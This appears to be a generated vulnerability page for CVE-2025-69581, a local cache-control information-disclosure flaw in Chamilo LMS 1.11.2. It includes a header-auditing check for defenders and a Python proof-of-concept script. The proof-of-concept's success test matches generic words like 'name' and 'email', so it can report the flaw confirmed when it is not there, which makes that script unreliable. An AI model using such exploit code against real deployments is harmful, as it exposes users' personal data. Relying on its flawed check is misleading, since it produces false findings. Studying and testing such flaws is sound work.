Security Vulnerability Report
CVE-2025-69581 CVSS 5.5 MEDIUM

CVE-2025-69581

Published: 2026-01-16 20:15:49
Last Modified: 2026-02-05 21:46:05

Description

An issue was discovered in Chamillo LMS 1.11.2. The Social Network /personal_data endpoint exposes full sensitive user information even after logout because proper cache-control is missing. Using the browser back button restores all personal data, allowing unauthorized users on the same device to view confidential information. This leads to profiling, impersonation, targeted attacks, and significant privacy risks.
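A defender-side check for the weakness described above (CWE-524 in the record below), as an added example that is not part of the advisory or of the product's code: it inspects the headers of a response carrying personal data and reports whether a browser is still permitted to keep a copy after logout. The function names, finding labels and sample headers are constructed for illustration.

```python
# Added example: audit the response headers of a sensitive page.
# Only `no-store` forbids keeping a copy; `private`, `no-cache` and `max-age=0`
# restrict sharing or force revalidation but still allow the browser to store it.

def parse_cache_control(value):
    """Return {directive: argument-or-None} with lower-cased directive names."""
    directives = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip().lower()] = arg.strip().strip('"') or None
    return directives


def audit_sensitive_response(headers):
    """Return a list of findings; an empty list means the page must not be stored."""
    # HTTP header names are case-insensitive, so normalise before lookup.
    lowered = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(lowered.get("cache-control", ""))
    if "no-store" in cc:
        return []
    if not cc:
        return ["missing-cache-control"]
    findings = ["no-store-absent"]
    if "public" in cc:
        findings.append("public-shared-cache")
    max_age = cc.get("max-age")
    if max_age and max_age.isdigit() and int(max_age) > 0:
        findings.append("positive-max-age")
    return findings


# Constructed sample headers (not captured from a real server).
SAMPLES = {
    "no cache headers": {"Content-Type": "text/html"},
    "private only": {"cache-control": "private, max-age=0"},
    "publicly cacheable": {"Cache-Control": "Public, Max-Age=3600"},
    "hardened": {"Cache-Control": "no-cache, no-store, must-revalidate"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label}: {audit_sensitive_response(hdrs) or 'ok'}")
```

Run the check against every authenticated page that renders personal data, and treat any non-empty result as a finding to fix in the application's response headers.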

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:1.11.2:*:*:*:*:*:*:* - VULNERABLE
Chamillo LMS 1.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-69581 PoC - Chamillo LMS Sensitive Information Disclosure
# This PoC demonstrates the information disclosure vulnerability via browser cache
import requests

TARGET_URL = "http://target-server/chamilo-lms"
PERSONAL_DATA_ENDPOINT = f"{TARGET_URL}/social/personal_data"


def exploit_cve_2025_69581():
    """
    Steps to exploit the vulnerability:
    1. Authenticate as a legitimate user
    2. Access the personal_data endpoint to trigger caching
    3. Logout from the application
    4. Use browser back button or directly access the cached endpoint
    5. Sensitive information will be displayed without authentication
    """
    session = requests.Session()

    # Step 1: Login as a legitimate user
    login_data = {
        "username": "victim_user",
        "password": "victim_password"
    }
    login_response = session.post(f"{TARGET_URL}/login", data=login_data)
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Successfully logged in")

    # Step 2: Access personal_data endpoint to trigger caching
    personal_data_response = session.get(PERSONAL_DATA_ENDPOINT)
    if personal_data_response.status_code == 200:
        print("[+] personal_data endpoint accessed, content cached by browser")
        print(f"[+] Response headers: {personal_data_response.headers}")

    # Step 3: Logout
    logout_response = session.post(f"{TARGET_URL}/logout")
    print("[+] User logged out")

    # Step 4: Try to access the cached endpoint without authentication
    # In real scenario, this would be done via browser back button
    # The server may reject, but browser will show cached content
    unauthenticated_response = session.get(PERSONAL_DATA_ENDPOINT)

    # Check if response contains sensitive information
    sensitive_keywords = ["name", "email", "phone", "address", "profile"]
    for keyword in sensitive_keywords:
        if keyword.lower() in unauthenticated_response.text.lower():
            print(f"[!] Sensitive keyword '{keyword}' found in response")
            print("[!] Vulnerability confirmed: Information disclosure via cache")
            return True
    return False


if __name__ == "__main__":
    print("CVE-2025-69581 - Chamillo LMS Information Disclosure")
    print("=" * 50)
    exploit_cve_2025_69581()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69581", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:49.287", "lastModified": "2026-02-05T21:46:04.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Chamillo LMS 1.11.2. The Social Network /personal_data endpoint exposes full sensitive user information even after logout because proper cache-control is missing. Using the browser back button restores all personal data, allowing unauthorized users on the same device to view confidential information. This leads to profiling, impersonation, targeted attacks, and significant privacy risks."}, {"lang": "es", "value": "Se descubrió un problema en Chamillo LMS 1.11.2. El endpoint /personal_data de la Red Social expone información sensible completa del usuario incluso después de cerrar sesión porque falta un control de caché adecuado. Usar el botón de retroceso del navegador restaura todos los datos personales, permitiendo a usuarios no autorizados en el mismo dispositivo ver información confidencial. 
Esto conduce a la elaboración de perfiles, suplantación de identidad, ataques dirigidos y riesgos significativos para la privacidad."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-524"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:1.11.2:*:*:*:*:*:*:*", "matchCriteriaId": "A3324481-48CB-4C31-881E-9487AB56DBC8"}]}]}], "references": [{"url": "https://github.com/Rivek619/CVE-2025-69581", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://github.com/chamilo/chamilo-lms", "source": "[email protected]", "tags": ["Product"]}]}}